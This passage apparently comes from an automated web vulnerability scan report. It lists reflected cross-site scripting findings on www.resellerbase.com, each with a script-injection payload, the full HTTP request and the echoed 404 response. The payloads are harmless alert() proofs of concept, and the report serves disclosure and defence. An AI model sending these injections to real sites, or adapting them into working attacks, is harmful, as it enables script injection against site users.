2.4803. http://www.resellerbase.com/themes/kosmos/trackclick.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/themes/kosmos/trackclick.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a7519<script>alert(1)</script>7091e5da24f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themesa7519<script>alert(1)</script>7091e5da24f/kosmos/trackclick.js HTTP/1.1
Accept: */*
Referer: http://www.resellerbase.com/new.php
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.resellerbase.com
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:23:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themesa7519<script>alert(1)</script>7091e5da24f/kosmos/trackclick.js was not found on this server.</p>
...[SNIP]...

2.4804. http://www.resellerbase.com/themes/kosmos/trackclick.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/themes/kosmos/trackclick.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4ee48<script>alert(1)</script>ea36ea8bf52 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmos4ee48<script>alert(1)</script>ea36ea8bf52/trackclick.js HTTP/1.1
Accept: */*
Referer: http://www.resellerbase.com/new.php
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.resellerbase.com
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:23:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmos4ee48<script>alert(1)</script>ea36ea8bf52/trackclick.js was not found on this server.</p>
...[SNIP]...

2.4805. http://www.resellerbase.com/themes/kosmos/trackclick.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/themes/kosmos/trackclick.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload becf4<script>alert(1)</script>a15883f62a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/kosmos/trackclick.jsbecf4<script>alert(1)</script>a15883f62a HTTP/1.1
Accept: */*
Referer: http://www.resellerbase.com/new.php
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.resellerbase.com
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:24:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8253

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /themes/kosmos/trackclick.jsbecf4<script>alert(1)</script>a15883f62a was not found on this server.</p>
...[SNIP]...

2.4806. http://www.resellerbase.com/top.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/top.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1cb96<script>alert(1)</script>335f22e045b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /top.php1cb96<script>alert(1)</script>335f22e045b HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/rss.php?type=top
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:12:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /top.php1cb96<script>alert(1)</script>335f22e045b was not found on this server.</p>
...[SNIP]...

2.4807. http://www.resellerbase.com/top.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/top.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9dbf8<script>alert(1)</script>1bb639f171a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /top.php?9dbf8<script>alert(1)</script>1bb639f171a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/rss.php?type=top
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:11:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /top.php?9dbf8<script>alert(1)</script>1bb639f171a=1 was not found on this server.</p>
...[SNIP]...

2.4808. http://www.resellerbase.com/top_rated.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/top_rated.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a7295<script>alert(1)</script>deab4c86f19 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /top_rated.phpa7295<script>alert(1)</script>deab4c86f19 HTTP/1.1
Accept: */*
Referer: http://www.resellerbase.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.resellerbase.com
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:24:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8240

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /top_rated.phpa7295<script>alert(1)</script>deab4c86f19 was not found on this server.</p>
...[SNIP]...

2.4809. http://www.resellerbase.com/trackclick.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/trackclick.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8b75b<script>alert(1)</script>54dc6de84e9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /trackclick.php8b75b<script>alert(1)</script>54dc6de84e9 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 01:17:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /trackclick.php8b75b<script>alert(1)</script>54dc6de84e9 was not found on this server.</p>
...[SNIP]...

2.4810. http://www.resellerbase.com/trackclick.php/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/trackclick.php/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4e10b<script>alert(1)</script>97961a1ead2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /trackclick.php4e10b<script>alert(1)</script>97961a1ead2/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 01:17:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /trackclick.php4e10b<script>alert(1)</script>97961a1ead2/ was not found on this server.</p>
...[SNIP]...

2.4811. http://www.resellerbase.com/travel-vaccation/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a6ed7<script>alert(1)</script>2c6a8f8318aa7ea05 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /travel-vaccationa6ed7<script>alert(1)</script>2c6a8f8318aa7ea05/?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccationa6ed7<script>alert(1)</script>2c6a8f8318aa7ea05/?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4812. http://www.resellerbase.com/travel-vaccation/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 89fb4<script>alert(1)</script>9b4ae8b707a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation89fb4<script>alert(1)</script>9b4ae8b707a/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation89fb4<script>alert(1)</script>9b4ae8b707a/ was not found on this server.</p>
...[SNIP]...

2.4813. http://www.resellerbase.com/travel-vaccation/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ae128<script>alert(1)</script>2365fa3ba2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/?ae128<script>alert(1)</script>2365fa3ba2=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/?ae128<script>alert(1)</script>2365fa3ba2=1 was not found on this server.</p>
...[SNIP]...

2.4814. http://www.resellerbase.com/travel-vaccation/ [select parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/

Issue detail

The value of the select request parameter is copied into the HTML document as plain text between tags. The payload 47102<a>f4db0089433 was submitted in the select parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /travel-vaccation/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f47102<a>f4db0089433 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f47102<a>f4db0089433 was not found on this server.</p>
...[SNIP]...

2.4815. http://www.resellerbase.com/travel-vaccation/googlepr.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/googlepr.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 84d1f<script>alert(1)</script>774982d9897 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation84d1f<script>alert(1)</script>774982d9897/googlepr.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation84d1f<script>alert(1)</script>774982d9897/googlepr.php was not found on this server.</p>
...[SNIP]...

2.4816. http://www.resellerbase.com/travel-vaccation/googlepr.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/googlepr.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6b53a<script>alert(1)</script>08389db50c6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/googlepr.php6b53a<script>alert(1)</script>08389db50c6 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/googlepr.php6b53a<script>alert(1)</script>08389db50c6 was not found on this server.</p>
...[SNIP]...

2.4817. http://www.resellerbase.com/travel-vaccation/googlepr.php [link_id parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/googlepr.php

Issue detail

The value of the link_id request parameter is copied into the HTML document as plain text between tags. The payload 1cb1e<a>6a1726b5782 was submitted in the link_id parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /travel-vaccation/googlepr.php?link_id=201cb1e<a>6a1726b5782 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/googlepr.php?link_id=201cb1e<a>6a1726b5782 was not found on this server.</p>
...[SNIP]...

2.4818. http://www.resellerbase.com/travel-vaccation/googlepr.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/googlepr.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2c90d<script>alert(1)</script>c282ec1078b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/googlepr.php?2c90d<script>alert(1)</script>c282ec1078b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/googlepr.php?2c90d<script>alert(1)</script>c282ec1078b=1 was not found on this server.</p>
...[SNIP]...

2.4819. http://www.resellerbase.com/travel-vaccation/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 40698<script>alert(1)</script>26478a05782 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation40698<script>alert(1)</script>26478a05782/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation40698<script>alert(1)</script>26478a05782/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4820. http://www.resellerbase.com/travel-vaccation/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 65d31<script>alert(1)</script>87fc93b9d81 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/search.php65d31<script>alert(1)</script>87fc93b9d81?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/search.php65d31<script>alert(1)</script>87fc93b9d81?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4821. http://www.resellerbase.com/travel-vaccation/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 9dc55<a>bcc3d74472d was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /travel-vaccation/search.php?keyword=search...&Submit3=Search9dc55<a>bcc3d74472d&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/search.php?keyword=search...&Submit3=Search9dc55<a>bcc3d74472d&opt=2 was not found on this server.</p>
...[SNIP]...

